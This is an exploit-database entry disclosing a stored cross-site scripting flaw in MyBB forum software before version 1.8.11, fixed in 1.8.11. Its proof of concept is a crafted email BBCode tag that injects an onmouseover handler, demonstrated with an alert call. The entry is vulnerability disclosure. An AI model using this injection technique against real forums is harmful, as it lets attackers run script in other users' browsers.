MyBB < 1.8.11 - email MyCode Cross-Site Scripting Vulnerability

2017-04-11T00:00:00
ID 1337DAY-ID-27562
Type zdt
Reporter Zhiyang Zeng
Modified 2017-04-11T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            Description:
============
 
product:MyBB
Homepage:https://mybb.com/
vulnerable  version:<1.8.11
Severity:High risk
 
===============
 
Proof of Concept:
=============
 
1.post a thread or reply any thread ,write:
 
[email=2"onmouseover="alert(document.location)]hover me[/email]
 
then when user’s mouse hover it,XSS attack will occur!
 
============
 
Fixed:
============
 
This vulnerability was fixed in version 1.8.11
 
https://blog.mybb.com/2017/04/04/mybb-1-8-11-merge-system-1-8-11-release/
 
=============

#  0day.today [2018-04-02]  #